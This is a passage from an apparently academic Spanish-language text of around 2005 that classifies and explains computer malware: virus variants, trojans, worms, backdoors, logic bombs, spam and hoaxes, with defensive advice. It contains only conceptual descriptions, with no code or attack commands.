antivirus más simples, a no ser que otro virus use idéntica rutina de descifrado y
se desee una identificación exacta (Google, 2005)29.

5.3.7 Virus acompañante (Companion). Para efectuar sus operaciones de

infección, los virus de compañía pueden esperar en la memoria hasta que se lleve

38
a cabo la ejecución de algún programa (virus residentes) o actuar directamente
haciendo copias de sí mismos (virus de acción directa) (Alerta virus, 2005)5.

Al contrario que los virus de sobre escritura o los residentes, los virus de compañía
no modifican los archivos que infectan. Cuando el sistema operativo está
trabajando (ejecutando programas, archivos con extensiones EXE y COM) puede
ocurrir que éste, el S.O, tenga que ejecutar un programa con un nombre
determinado. Si existen dos archivos ejecutables con el mismo nombre pero con
diferentes extensiones (uno con extensión EXE y otro con extensión COM), el
sistema operativo ejecutará en primer lugar el que lleve la extensión COM. Esta
peculiaridad del sistema operativo es aprovechada por los virus de compañía. En
caso, de existir un archivo ejecutable con un determinado nombre y extensión
EXE, el virus se encargará de crear otro archivo con el mismo nombre pero con
extensión COM haciéndolo invisible (oculto) al usuario para evitar levantar
sospechas.

El archivo que se crea será el propio virus y el sistema operativo, al encontrarse

con dos archivos que llevan el mismo nombre, ejecutará en primer lugar el de
extensión COM, siendo éste el virus que en ese preciso instante realizará la
infección. Tras realizarse la ejecución del archivo COM correspondiente al virus,
éste devuelve el control al sistema operativo para que ejecute el archivo EXE. De
esta forma el usuario no tendrá conocimiento de la infección que en ese preciso
instante ha tenido lugar (Alerta virus, 2005)5.

5.3.8 Virus blindado (Armored). Un virus blindado es el que usa técnicas

especiales para hacer más difícil el desensamblado, seguimiento y comprensión
de su código, como lo es el virus Whale (Google, 2005)29.

5.3.9 Virus de hueco (Cavity). Un virus de hueco es el que sobrescribe una

parte del archivo origen que está llena por una constante, (generalmente null),
sin incrementar la longitud del archivo pero preservando su funcionalidad.
(Como lo hace el virus Lehigh) (Google, 2005)29.

5.3.10 Virus (Tunnelling). Un virus "Tunnelling" es el que busca los

controladores originales de las interrupciones de DOS y BIOS y los llama
directamente, saltándose cualquier programa de supervisión activo que pueda
estar cargado y haya interceptado los respectivos vectores de interrupción
en un intento de detectar actividad viral. Algunos antivirus también usan técnicas
de "Tunnelling" intentando sortear cualquier virus no detectado ó desconocido
que pueda estar activo Cuando se ejecutan (Google, 2005)29.

5.4 CLASIFICACIÓN DE LOS VIRUS

39
Los virus en la actualidad presentan distintos tipos de infección y formas de ataque
para lo cual existen algunas clasificaciones para estos tipos de código, debido a
que estos no se propagan todos de igual manera ni por los mismos medios, y no
siempre efectúan los mismos ataques a los usuarios; algunos existen para
recopilar información como passwords del usuario quien a sido infectado y luego
retransmitir esta información a personas ajenas, otros simplemente atacan los
datos que se encuentran almacenados y otros tienen como objetivo ralentizar el
flujo de la información donde el Internet por ejemplo ya ha sido victima.

5.4.1 Virus. Un verdadero virus tiene como características más importantes la

capacidad de copiarse a sí mismo en soportes diferentes al que se encontraba
originalmente, y por supuesto hacerlo con el mayor sigilo posible y de forma
transparente al usuario; a este proceso de auto réplica se le conoce como
"infección", de ahí que en todo este tema se utilice la terminología propia de la
medicina: "vacuna", "tiempo de incubación", etc. Un virus puro también debe
modificar el código original del programa o soporte objeto de la infección, para
poder activarse durante la ejecución de dicho código; al mismo tiempo, una vez
activado, el virus suele quedar residente en memoria para poder infectar así de
forma transparente al usuario (El Hacker, 2005)20.

5.4.2 Troyano. Timeo Danaos et dona ferentes - Temo a los griegos incluso
cuando hacen un regalo. (Virgilio, la Eneida, II, 49).

En la historia Troya era una ciudad inquebrantable para los griegos quienes
intentaban tomarla, estos al ver la dureza de los troyanos simularon su retirada y
fin del asedio, dejando, como presente y muestra de respeto, un enorme caballo
de madera. Los troyanos aceptaron este enorme caballo y lo introdujeron en su
ciudad. Pero en realidad el caballo era una estrategia utilizada por los griegos para
tomar la ciudad, ya que contenía en su interior a soldados enemigos, que cuando
tuvieron la oportunidad, salieron y permitieron el paso de sus tropas abriendo las
puertas de la ciudad así de esta manera tan ingeniosa finalmente tomaron Troya.

Aplicado al mundo de la informática, los troyanos eran conocidos como una

modalidad de virus informático, hasta que con el auge de Internet, y utilizando su
arquitectura básica de cliente-servidor, tomaron su propio rumbo, haciéndose, hoy
en día, una distinción muy clara entre lo que es un virus y lo que es un troyano.

Un Troyano (Trojan) o Caballo de Troya es un programa basado en una

arquitectura cliente-servidor. Por lo cual es utilizado como una efectiva
herramienta de administración remota. Son aplicaciones ocultas en otro tipo de
archivos también ejecutables que al ser ejecutadas en un ordenador por el usuario
de una red que utiliza los protocolos TCP/IP (ya sea LAN o Internet) permite que
el atacante pueda tomar control del equipo remoto sin autorización, desde otro PC.
Por lo general un Troyano se instala en segundo plano de manera que cuando la
victima ejecuta el primer programa este se instala sin levantar sospechas. Es de

40
aquí de donde viene la comparación con la leyenda del caballo de Troya (El
Hacker, 2005)19.

Arquitectura de un Troyano. La arquitectura de un troyano tiene

principalmente dos componentes. Programa Servidor y Programa Cliente, algunos
tienen componentes extras, principalmente los más recientes que incluyen algunos
addins para habilitar un mayor número de funciones o un programa editor para dar
una configuración mas personalizada al servidor y así tener un mayor control
sobre las victimas, como es el caso del Subseven.

Programa Servidor. El Servidor que ha sido previamente instalado en la

PC de la victima, es un programa que ocupa muy poco espacio (desde 3 Kb hasta
poco mas de 1 Mb), mientras menos espacio ocupe es mejor ya que este va
anexado a otro ejecutable intentando pasar desapercibido. El servidor va asociado
al Cliente, así el servidor crea un backdoor (puerta trasera) para permitir la
intrusión del atacante por cualquiera de los 65536 puertos TCP/IP.

Programa Cliente. El cliente que se encuentra desde el ordenador del

intruso generalmente tiene una interfaz con opciones desde las cuales puede
ejecutar remotamente acciones determinadas sobre la PC de la victima.

Programa Editor. Es opcional y viene incluido en algunos troyanos

exclusivamente, este configura y personaliza el modulo servidor dándole opciones
de métodos para avisar cuando la victima se ha conectado e identificarla
fácilmente en caso de tener varias victimas por medio de su dirección IP.

Como funcionan. Un Troyano consta de dos módulos Cliente y Servidor,

son indispensables ambos para su funcionamiento. Este crea una puerta trasera el
cual proporciona la posibilidad de un acceso no autorizado al ordenador de la
víctima, de tal forma que abre un canal de comunicación por donde se puede
acceder a su sistema.

El módulo servidor puede estar protegido con una contraseña la cual debe ser
introducida por el cliente para tener el control, de esta manera el atacante evita
que otra persona intente desde otro modulo cliente tome el control. El cliente
necesita la dirección IP de la maquina donde esta instalado el modulo servidor
para poder entablar una conexión. El cual puede ser enviado por el servidor a una
lista de correo, un canal de IRC, al ICQ, algún correo electrónico, un mensaje
instantáneo, etc. El equipo servidor mantiene abiertos uno o mas puertos
específicos a la espera de tener comunicación con el programa cliente y así
empezar a recibir instrucciones para empezar a ejecutarlas.

Los Caballos de Troya no se reproducen solos por lo que no son considerados un

virus como tal, no realizan acciones destructivas por si solos, lo que dificulta su
detección, pueden llegar a permanecer activos durante mucho tiempo, de hecho

41
muchas personas conviven con más de algún Troyano en el PC y nunca llegan a
percatarse de ello.

Un Troyano necesita la intervención del usuario cliente para poder realizar

cualquier acción. Salvo escasas ocasiones en que existe un gran numero de
variantes del mismo troyano debido a que el código fue publicado por el autor, las
empresas antivirus no los catalogan en la categoría de virus ni alcanzan los altos
niveles de peligrosidad (El Hacker, 2005)19.

5.4.3 Gusano. Y Paul se encontró con el gusano, exultante, como un Emperador

dominando el universo. (F. Herbert "Dune")

Un gusano, al igual que un virus, está diseñado para copiarse de un equipo a otro,
pero lo hace de forma automática tomando el control de las características del
equipo que pueden transportar archivos o información. Una vez que el virus está
en el sistema, puede desplazarse sólo. El mayor peligro de los gusanos es su
capacidad para replicarse en grandes cantidades. Por ejemplo, un gusano puede
enviar copias de sí mismo a todas las personas que se encuentran en la libreta de
direcciones de correo electrónico y los equipos de esas personas harán lo mismo,
produciendo un efecto dominó de obstrucción del tráfico de red que ralentizaría las
redes de las empresa e Internet en general. Cuando aparecen nuevos gusanos, se
extienden rápidamente, atascando las redes y, posiblemente, haciendo que los
usuarios tengan que esperar hasta el doble de tiempo para ver páginas Web en
Internet.

Esta amenaza generalmente se propaga sin que el usuario realice ninguna acción
y distribuye copias completas (posiblemente modificadas) de sí mismo por las
redes. Un gusano puede consumir memoria o ancho de banda de la red, haciendo
así que un equipo deje de responder. Debido a que los gusanos no necesitan
desplazarse mediante un archivo o programa "anfitrión", también pueden crear
agujeros en el sistema que permiten que alguien penetre y tome el control del
equipo de forma remota. Un ejemplo es el reciente gusano MyDoom el cual
estaba diseñado para abrir una "puerta trasera" en sistemas infectados y utilizar
esos sistemas para atacar sitios Web.

Los Gusanos son programas que tienen como única misión la de colapsar
cualquier sistema, ya que son programas que se copian en archivos distintos en
cadena hasta crear miles de replicas de si mismo. Así un” gusano” de 866 Kb,
puede convertirse en una cadena de ficheros de miles de Megas, que a su vez
puede destruir información, ya que sustituye estados lógicos por otros no idénticos
(Microsoft, 2005)42.

Estos programas suelen habitar en la red a veces como respuesta de grupos de

Hackers que pretenden obtener algo. La existencia de uno de estos gusanos se
hace notar, cuando la red se ralentiza considerablemente, ya que normalmente el

42
proceso de auto replicado llena normalmente el ancho de banda de trabajo de un
servidor en particular (Hernández, 2005)31.

Este código sigue el mismo principio que los virus. Son programas que intentan
replicarse a sí mismos para conseguir una propagación máxima. Aunque no es su
principal característica, también pueden contener una bomba lógica con un
detonador retardado. La diferencia entre los gusanos y los virus la da el hecho de
que los gusanos no utilizan programas host como medio de transporte, sino que
se benefician de las capacidades que proveen las redes, como el correo
electrónico, para propagarse de máquina en máquina (Blaess, 2005)8.

El nivel técnico de los gusanos es bastante alto; usan las vulnerabilidades de

software que ofrecen los servicios de red para forzar su auto-duplicación en una
máquina remota. El arquetipo es el "Internet Worm" de 1988, El Internet Worm
es un ejemplo de gusano puro, sin contener una bomba lógica, sin embargo su
involuntario efecto devastador fue terrible. Los gusanos son relativamente raros
debido a su complejidad. No se deben mezclar con otro tipo de peligros, como los
virus transmitidos como adjuntos a un correo electrónico como el famoso “I
LoveYou”. Los virus son mucho más simples ya que son macros escritas (en
Basic) para aplicaciones de ofimática que se lanzan automáticamente cuando se
lee el correo. Esto sólo funciona en algunos sistemas operativos, cuando el lector
de correo está configurado de forma demasiado simple. Estos programas se
parecen más a los troyanos que a los gusanos, ya que requieren una acción del
usuario para ejecutarse (Blaess, 2005)8.

Cómo se propagan los gusanos y otros tipos de virus. Prácticamente

todos los virus y la mayoría de los gusanos no pueden propagarse a menos que
se ejecute un programa infectado. Muchos de los virus más peligrosos se
propagaron inicialmente mediante los datos adjuntos de los correos electrónicos
(los archivos que se envían con un mensaje de correo electrónico). Normalmente
se puede saber si el correo electrónico contiene datos adjuntos porque aparece el
icono de un sujetapapeles que representa los datos adjuntos con su nombre.
Fotografías, cartas escritas en un editor de texto e incluso hojas de cálculo, son
sólo algunos de los tipos de archivos que se reciben a través del correo
electrónico cada día. El virus se inicia al abrir los datos adjuntos del archivo
(normalmente al hacer doble clic en el icono de datos adjuntos).

Cómo saber si se tiene un gusano u otro tipo de virus. Al abrir y ejecutarse

un programa infectado, existe la posibilidad de no saber que este contiene un
virus. Puede suceder que el equipo se ralentice, deje de responder o se bloquee y
se reinicie cada pocos minutos. A veces, un virus ataca los archivos necesarios
para iniciar el equipo. En ese caso, puede suceder que al momento de presionar el
botón de encendido llegue aparecer una pantalla en blanco. Todos estos síntomas
son signos comunes de que el equipo tiene un virus, aunque también pueden ser
provocados por problemas con el hardware o el software que no tiene nada que

43
ver con un virus. Se debe tener cuidado con los mensajes que advierten que se ha
enviado un mensaje que es portador de un virus. Esto puede significar que el virus
ha colocado la dirección del correo electrónico como remitente de un correo
infectado. No significa necesariamente que este tenga un virus.

Algunos virus tienen la capacidad de falsificar direcciones de correo electrónico. A

esto se le conoce como imitación. A menos que se cuente con un software
antivirus instalado en el, no hay ninguna manera eficaz de saber si hay un virus o
no, si no hay un software antivirus actualizado (Microsoft, 2005)42.

5.4.4 Puertas traseras. “Cualquier medio capaz de ampliar el alcance del

hombre es lo suficientemente poderoso como para derrocar su mundo. Conseguir
que la magia de ese medio trabaje para los fines de uno, antes que en contra de
ellos, es alcanzar el conocimiento.” Alan Kay.

Los Backdoors o puertas traseras no son considerados propiamente como virus,

pero representan un riesgo de seguridad importante, y usualmente son
desconocidas, pero son grandes los problemas que estas pueden llegar a
producir, haciendo referencia a una forma "no oficial" de acceso a un sistema
o a un programa. Algunos programadores dejan puertas traseras a propósito, para
poder entrar rápidamente en un sistema; en otras ocasiones existen debido a
fallos o errores.

Las Backdoors representan una de las formas típicas de actuación de los piratas
informáticos, donde tienen la posibilidad de introducirse en los diversos sistemas
por una puerta trasera. Estos programas no se reproducen solos como los virus,
sino que son enviados con el fin de tener acceso a equipos, muchas veces a
través del correo electrónico, por lo que la mayoría de las veces no son fáciles de
detectar y no siempre causan daños ni efectos inmediatos por su sola presencia,
siendo así que pueden llegar a permanecer activos mucho tiempo sin que sean
detectados. Generalmente las Backdoors se hacen pasar por otros programas, es
decir, se ocultan en otro archivo que les sirve de caballo de Troya para que el
usuario los instale por error. Lo peor que puede pasar cuando se está en el
Messenger o en el ICQ no es contagiar el PC con un virus. Lo peor es que alguien
instale una backdoor en el equipo. Las puertas traseras se basa en la arquitectura
cliente / servidor, sólo se necesita instalar un programa servidor en una máquina
para poder controlarla a distancia desde otro equipo, si se cuenta con el cliente
adecuado, esta puede bien ser la computadora de un usuario descuidado o poco
informado.

Las puertas traseras (Backdoors) son programas que permiten acceso

prácticamente ilimitado a un equipo de forma remota. El problema, para quien
quiere usar este ataque, es que debe convencer a la persona de que instale el
servidor. Por eso, es probable que aparezcan desconocidos ofreciendo algún

44
programa maravilloso y tentador que en realidad es un Troyano el cual es portador
de un servidor que proporcionará a algún intruso el acceso total a la computadora.
(Moreno, 2005)45.

Con todo el riesgo que esto implica, la forma más simple y totalmente segura de
evitarlo es no aceptar archivos ni mucho menos ejecutar programas que hayan
sido enviados de origen dudoso. Los programas que se clasifican como
backdoors o "puertas traseras" son utilidades de administración remota de una
red que permiten controlar los equipos conectados a ésta. El hecho que se les
clasifique como software malévolo en algunos casos, es que cuando corren, se
instalan en el sistema sin necesidad de la intervención del usuario y una vez
instalados en el ordenador, no se pueden visualizar estas aplicaciones en la lista
de tareas en la mayoría de los casos.

Consecuentemente una backdoor puede supervisar casi todo proceso en las

computadoras afectadas, desinstalar programas, descargar virus en la PC remota,
borrar información y muchas cosas más. Lo importante es que hay ciertas
medidas mínimas para evitar un ataque, la información sensible que se encuentre
en cualquier equipo, con el simple hecho de que tenga acceso a la Internet es
suficiente para estar expuesto a ataques de diversa índole. (Moreno, 2005)45.

Las puertas traseras backdoors se pueden comparar con los Troyanos pero no
son idénticas. Una puerta trasera permite a un usuario avanzado actuar en una
aplicación para cambiar su comportamiento. Se puede comparar con los cheat
codes usados en los juegos para obtener más recursos, alcanzar un nivel
superior, etc. Pero también afectan las aplicaciones críticas como autentificación
de conexiones o correo electrónico, ya que pueden tener un acceso oculto con
una contraseña conocida sólo por el creador del software.

Los programadores con la intención de facilitar la fase de depuración, a menudo

dejan una pequeña puerta abierta para poder usar el software sin hacerlo a través
del mecanismo de autentificación, incluso cuando la aplicación se ha instalado en
el cliente. A veces hay mecanismos de acceso oficial que usan contraseñas por
defecto (system, admin, superuser, etc) pero no está muy claro qué lleva a los
administradores dejarlas activas.Como ejemplo se tiene a uno de los padres de
Unix, quien describe un acceso escondido que implementó en los sistemas Unix
hace varios años, Empezó cambiando la aplicación /bin/login para incluir un
pequeño código, que permitía el acceso directo al sistema escribiendo una
contraseña incluida de forma precompilada (no tomada de /etc/passwd). De esta
forma, Thompson podía visitar todos los sistemas usando su versión de login
(Blaess, 2005)8.
Sin embargo, entonces los códigos fuente de las aplicaciones estaban disponibles
(como hoy en el software libre). Luego el código fuente login.c estaba presente en
los sistemas Unix y cualquiera podría haber leído el código incluido. De esta
manera, Thompson puso un login.c limpio sin la puerta de acceso. El problema

45
era que cualquier administrador podía recompilar login.c eliminando así la versión
falsa. Entonces, Thompson modificó el compilador estándar de C para hacerle
capaz de incluir la puerta trasera cuando notara que alguien intentaba compilar
login.c. Pero, de nuevo, el código fuente del compilador cc.c estaba disponible y
cualquier persona podría leer y recompilar el compilador. Así pues, Thompson
puso un código fuente limpio del compilador, pero el fichero binario, ya procesado,
era capaz de identificar sus propios ficheros fuente, incluyendo el código usado
para infectar login.c.

La única forma de resolver un problema así sería recomenzar con un sistema

completamente virgen. A menos que se construya una máquina a partir de cero
creando todo el microcódigo, el sistema operativo, los compiladores, las utilidades,
no se podría estar seguro de que todas las aplicaciones estén limpias, incluso si
está disponible el código fuente (Blaess, 2005)8.

5.4.5 Bomba lógica o Bomba de Tiempo. Las Bombas lógicas o Bombas de

Tiempo, son programas maliciosos, los cuales se activan después de transcurrido
un tiempo días o horas o inclusive se activan en una fecha en particular, o
simplemente en el momento en que el usuario hace uso de algunas teclas o
comandos establecidos por el creador dicho programa. Una bomba lógica es una
puede llegar a tener efectos muy variados como por ejemplo:

- Consumo excesivo de los recursos del sistema (memoria, disco duro,

CPU, etc.).

- Rápida destrucción del mayor número de ficheros posible

(sobrescribiéndolos para evitar que se pueda recuperar su contenido).

- Destrucción disimulada de un fichero de vez en cuando, para permanecer

invisible el mayor tiempo posible.

- Ataque a la seguridad del sistema (implementación de derechos de acceso

muy permisivos, envío del fichero de contraseñas a una dirección de
Internet, etc.).

- Uso de la máquina para terrorismo informático, como un DDoS

(Distributed Denial of Service, Denegación de Servicio)

- inventario de números de licencia de las aplicaciones en el disco y envío de

los mismos a un programador.

En algunos casos la bomba lógica puede estar escrita para un sistema objetivo
específico en el que se intentaría robar información confidencial, destruir ciertos
ficheros o desacreditar a un usuario tomando su identidad. La misma bomba
ejecutada en cualquier otro sistema será inofensiva (Blaess, 2005)8.

46
La bomba lógica o de tiempo también puede intentar destruir físicamente el
sistema en el que reside. Las posibilidades son muy pequeñas pero existen
(borrado de memorias CMOS, cambio en la memoria flash de modems,
movimientos destructivos de cabezales de impresoras, plotters, escáneres,
movimiento acelerado de las cabezas lectoras de los discos duros, etc.)

Estos programas requieren de un detonador para ser activados. En efecto, la

generación de acciones devastadoras de Troyanos o virus en una primera
ejecución es una mala táctica desde el punto de vista de la eficiencia. Tras
instalarse la bomba lógica, es mejor para ella esperar antes de explosionar. Esto
incrementará las oportunidades de extenderse a otros sistemas en el caso de
transmisión por virus; y en el caso de un Troyano evitará que el usuario relacione
fácilmente la instalación de la nueva aplicación con el comportamiento anormal de
su máquina.

Como en cualquier acción maligna, el mecanismo de lanzamiento puede variar:

diez días después de la instalación, borrado de una cuenta de usuario dada
(licencia), teclado y ratón inactivos durante 30 minutos, gran actividad en la cola
de impresión, etc. Cuando la Bomba lógica viene adherida a un Troyano por
ejemplo uno que funciona por medio de un protector de pantalla, este puede
activarse después de una hora, tiempo en el cual a estado funcionando el
protector de pantalla donde es muy probable que el usuario no este sentado frente
al equipo y la Bomba se active sin que este se percate del daño (Blaess, 2005)8.

Al igual que un virus las bombas lógicas están especialmente diseñadas para
hacer daño. Existen dos definiciones del mismo acrónimo o programa asociado.
Una es la de crear un subprograma que se active después de un tiempo llenando
la memoria del ordenador y otra es la de colapsar el correo electrónico. De
cualquier forma ambos son dañinos, pero actúan de forma diferente.

En la primera referencia, este se instala en el ordenador después de ser bajado

junto a un mensaje de e-mail. Se incuba sin crear ninguna copia de sí mismo a la
espera de reunir las condiciones oportunas, tras ese periodo de espera el
programa se activa y sé auto replica como un virus hasta dañar el sistema.

En el segundo caso, alguien envía una bomba lógica por e-mail que no es sino
que un mismo mensaje enviado miles de veces hasta colapsar nuestra maquina.

Los programas antivirus no están preparados para detectar estos tipos de bombas
lógicas, pero existen programas que pueden filtrar la información repetida. De
modo que la única opción que tienen para hacer daño es introducir una bomba

47
lógica que se active frente a determinadas circunstancias externas (Hernández,
2005)31.

5.4.6 Spam. El significado designa a un alimento enlatado consistente en carne

de cerdo picada con especias (Spiced Ham). Fue el primer producto de carne
enlatada que no requería refrigeración. La aplicación a la informática toma su
nombre de un sketch llamado Flying Circus (1969 - 1974) del grupo cómico
inglés Monty Python en el que la camarera de un restaurante describe a una
pareja los platos del menú en el cual todos los platos contenían spam (Pacheco,
2005)54.

No se trata de un código dañino, pero si bastante molesto, se trata de un simple

programa que ejecuta una orden repetidas veces. Normalmente en correo
electrónico. Así un mensaje puede ser enviado varias cientos de veces a una
misma dirección. En cualquier caso existen programas, antispam, ya que los
spam son empleados normalmente por empresas de publicidad directa
(Hernández, 2005)31.

Se considera que un mensaje es spam sí y sólo sí el mensaje es no solicitado y, a

su vez, es masivo. No solicitado significa que el receptor no dio un permiso
verificable al remitente para que este le envíe el mensaje. Masivo significa que el
mensaje es enviado como parte de una colección mayor de mensajes, donde
todos tienen el contenido sustancialmente idéntico.

La palabra "Spam" aplicada al e-mail significa Correo Electrónico Masivo No

Solicitado (Unsolicited Bulk Email - "UBE"). Un mensaje electrónico es spam si:

La identidad personal del receptor y el contexto son irrelevantes porque el

mensaje es igualmente aplicable a muchos otros receptores potenciales.

No se puede verificar que el receptor haya dado un permiso deliberado, explícito, y

revocable, para que el mismo le sea enviado (Pacheco, 2005)54.

Se denomina correo basura también conocido como junk-mail o spam a una

cierta forma de inundar la Internet con muchas copias (incluso millones) del mismo
mensaje, en un intento por alcanzar a gente que de otra forma nunca accedería a
recibirlo y menos a leerlo.
La mayor parte del correo basura está constituido por anuncios comerciales,
normalmente de productos dudosos, métodos para hacerse rico o servicios en la
frontera de la legalidad. No dejan de generar molestias a los usuarios de Internet
cuando encuentran sus buzones rebosando con correos que anuncian productos o
mensajes sin importancia (Álvarez, 2005)6.
Las listas de correo basura con las direcciones de correo electrónico de los
clientes potenciales (o víctimas seguras) se crean frecuentemente robando
direcciones en las listas de distribución o comprándolas en las bases de datos de

48
los servicios en línea de Internet o bien buscando direcciones por la red.
Irónicamente, los propios spammers usan el spam para anunciarse (Álvarez,
2005)6.

- El origen de las direcciones de los correos spam generalmente provienen de:

Internet: foros, páginas de tarjetas virtuales, newsgroups, mailing lists,

suscripciones, confirmación de datos para downloads.

Listas comerciales: existen personas que venden listas de correo electrónico a los
spammers, y las obtienen en encuestas, y bases de datos comerciales de
distintas empresas.

Adivinando: más conocido como el "método del diccionario" también es muy

efectivo para obtener direcciones de correo electrónico. Se lo aplica en grandes
dominios.

Mail Servers mal configurados: los llamados “open relay servers” y proxies
abiertos permiten actuar de escalón hacia la anonimidad de los spammers.

El disfraz de ISP: se compra ancho de banda a las compañias de

telecomunicaciones y se actúa como ISP, cambiando de rango con frecuencia.

Cuentas “one time”: son las que se utilizan para enviar spam hasta que son
dadas de baja.

Conexiones inalámbricas: un método que aprovecha las vulnerabilidades de las

redes wireless mal configuradas, desprotegidas, no segmentadas, y de acceso no
restringido (Pacheco, 2005)54.

La mayor parte del spam que se recibe consiste en:

Cadenas de mensajes
Esquemas de "gane plata rápidamente"
Avisos de servicios y/o sitios pornográficos
Avisos de servicios de envío de spam
Avisos de software y bases de datos para hacer spam
Ofertas de hosting
Avisos de acciones de empresas nuevas
Productos milagrosos de dudoso efecto y origen
Software ilegal, películas y/o música pirateada

Existen algunas técnicas de filtrado:

Todas las soluciones anti-spam implican genéricamente algunos pasos:

49
Analizar el e-mail y "etiquetarlo", según varios criterios: origen, tamaño, tema,
contenido, etc.

Según la "etiqueta" de cada mensaje, aplicarle acciones predefinidas: "bajarlo" o

no, colorearlo, moverlo, borrarlo, poner el remitente en una lista de direcciones,
etc. Algunas de estas soluciones operan antes de que la bajada del mail
(típicamente dependen del ISP), Otras requieren software que operan sobre el e-
mail cuando ya lo tiene en la computadora.

Una solución anti-spam podrían ser los Filtros bayesianos, La Lógica bayesiana,
creada por el matemático inglés Thomas Bayes en 1763, se basa en las
estadísticas y las probabilidades para predecir el futuro. Por ejemplo, la palabra
"sexy" es muy probable que aparezca en un correo basura. A partir de aquí, es
fácil escribir un algoritmo que filtre los mensajes que contengan palabras
'peligrosas' y este aprenda con el tiempo.

Cuando llega un nuevo mensaje, el programa compara su contenido con la lista de

palabras prohibidas, analiza el contexto y calcula las probabilidades de que sea
basura: "Se tienen en consideración tanto lo bueno como lo malo: palabras que no
suelen aparecer en los spams, como "esta noche" o "aparentemente", reducen
mucho la probabilidad, mientras otras como "unsubscribe" o "Viagra" la
incrementan. La ventaja, ante la mayoría de filtros que sólo tienen en
consideración de dónde viene el mensaje (listas negras) o los más nuevos, que se
fijan también en el contenido, es que los filtros bayesianos evolucionan con el
spam. Si cambian las palabras, los filtros se dan cuenta automáticamente
(Pacheco, 2005)54.

5.4.7 Hoax. En la actualidad hay miles de que virus descubiertos cada año,
pero hay algunos que solamente existen en la imaginación del público y la
prensa. Esta serie de virus no existen, a pesar del rumor de su creación y
distribución, por esto se debe ignorar cualquier mensaje con respecto a estos
supuestos "virus" y no pasar ningún mensaje sobre ellos. El reenviar mensajes
sobre estos "virus-engaño" solamente sirve para fomentar su propagación.

Un ejemplo de Hoax es el siguiente mensaje de advertencia: "Le envío este correo

para informarle de que si ha recibido un fichero llamado “Cartablanca”, de
cualquiera de sus amigos. Bórrelo inmediatamente después de leer esto así
como el fichero que contiene el virus, el cual se activara el 26 de Noviembre y
borrara todos los datos del hardware del PC. ......(envía este correo a otras
personas) (google, 2005)29.

Una de las características mas destacadas que se puede observar es lo que bien
pudiera llamarse "el fenómeno Internet" son los lazos que se generan entre los
integrantes de la red global. El crecimiento que se produce día a día en los foros

50
temáticos, de la mano de este fenómeno, se observa otro, el cual es la solidaridad
que se establece entre los participantes, que a su vez se acompaña de un
producto marginal. El Hoax se aprovecha de la unión que existe entre las
comunidades de Internet y por esto en lo buzones de correo electrónico, aparecen
los mensajes que previenen sobre destructivos virus que podrían llegar a los
equipos de los usuarios incorporados en otros mensajes y que piden se haga
propaganda de la alerta difundiéndolo a toda dirección de correo que se halle en la
lista de direcciones.

Los mensajes de engaño, son redactados con un lenguaje apropiado que le otorga
credibilidad por parte de quien lo recibe, son falsos y en realidad son la "propia
enfermedad" sobre la cual aparentemente previenen, aprovechando el temor que
tiene la gente a los virus informáticos y a su solidaridad para prevenir que
personas conocidas sean infectadas. La mejor "vacuna" contra estos mensajes es
no prestar atención al contenido alarmista que estos llevan.

Existen varios métodos para identificar los virus Hoax, pero primero se debe tener
en consideración que hace que un "virus" de estas características tenga éxito en
Internet.

Hay dos factores conocidos que son: (A) lenguaje que impresiona "técnico", y (B)
credibilidad por asociación. Si la advertencia utiliza el lenguaje técnico apropiado,
la mayoría de las personas, incluyendo quienes estén informados sobre
cuestiones tecnológicas, se inclinan a creer que la advertencia es real. Por
ejemplo, el Hoax "Good Times" dice que "...si el programa no se detiene, el
procesador de la computadora será colocado en un bucle binario infinito de
enésima complejidad, que puede dañar gravemente el procesador...".

La primera vez que el usuario lee esto, le impresiona como si pudiera haber algo
de verdad en él. Si se investiga un poco, se descubre que no existe tal cosa como
un bucle binario infinito de enésima complejidad y que los procesadores están
diseñados para ejecutar bucles durante semanas a la vez sin dañarse. Cuando se
menciona "credibilidad por asociación", se hace referencia a quien es el supuesto
remitente que envía la advertencia. Si es un usuario perteneciente a una
organización tecnológica importante el envía la advertencia a alguien fuera de la
organización, la gente del exterior tiende a creer en la advertencia porque la
empresa debería tener conocimiento de tales asuntos (Morlans, 2005)48.

Aunque el usuario que envía el mensaje no tenga idea de lo que esta hablando, el
prestigio de la empresa lo respalda, dándole una apariencia real. Si un gerente de
la empresa envía la advertencia, el mensaje esta doblemente respaldado por las
reputaciones de la compañía y del gerente.
Los destinatarios de estos mensajes deberían estar especialmente atentos si la
advertencia los incita a reenviar el mensaje a las listas de correo. Esto debería ser
como una alerta roja indicando que el mensaje puede ser un Hoax. Otra señal de

51
alerta a la que se debe prestar atención es cuando el mensaje indica que es una
advertencia del FCC (Federal Communication Commission - Comisión Federal
de Comunicaciones). Según el FCC, no han difundido, y nunca difundirán
mensajes de advertencia sobre virus, ya que no es parte de su trabajo.

Ningún virus puede venir en el texto de un mensaje. Si, en cambio, puede hacerlo
en un archivo adjunto que se recibe junto a un mensaje y que en este caso, la
mejor protección es desconfiar y no ejecutar el archivo adjunto que se recibe de
fuentes desconocidas y aun conocidas cuando previamente no se tiene
conocimiento del envío (Morlans, 2005)48.

5.5 OTRAS AMENAZAS

Dejando a un lado los temibles Virus y los caballos de Troya entre otros, existen
otras amenazas en la red prediseñados para monitorear el paso de datos en línea
donde se toman prestados algunos passwords y números de tarjetas de crédito.
Estos programas capaces de monitorear a alguien en particular o todo aquello que
se mueve en la red, reciben el nombre de Sniffers y como su nombre lo indica, son
programas capaces de interpretar todos los datos de la red, copiarlos y
modificarlos. Otras amenazas son los buscadores de puertos libres IRQ, con estos
programas se pueden localizar puertos libres o abiertos y entrar por ellos a otros
sistemas. A veces estos puertos contienen Bugs. Fallos y los hackers las
emplean para penetrar en los sistemas (Hernández, 2005)31.

5.6 LA VIDA DE UN VIRUS

Es claro que el virus es creado como subprograma o microprograma ejecutable,

después de esto se libera en la red o se copia dentro de un programa comercial de
gran difusión, para asegurar un contagio rápido y masivo. Luego de esta primera
fase de creación, vienen las fases más importantes a cumplir de forma automática
e independiente del control que va ha tomar el virus según su creador lo haya
programado, proceso consta de contagio, incubación, replicación y ataque
(Hernández, 2005)31.

5.6.1 El contagio. El contagio es quizás la fase más fácil de todo este arduo
proceso. Solo hay que tener en cuenta que el virus debe introducirse o liberarse
en la red. El virus debe ir incrustado en un archivo de instalación o en una simple
pagina Web a través de los cookies. Las vías de infección son también
principalmente los diskettes, programas copiados, Internet o el propio correo
electrónico, en este ultimo caso el contagio es considerado como masivo y por lo
tanto, muy peligroso, como lo fueron los virus Melissa o I Love You (Hernández,
2005)31.
5.6.2 La incubación. Normalmente los virus se crean de formas especificas que
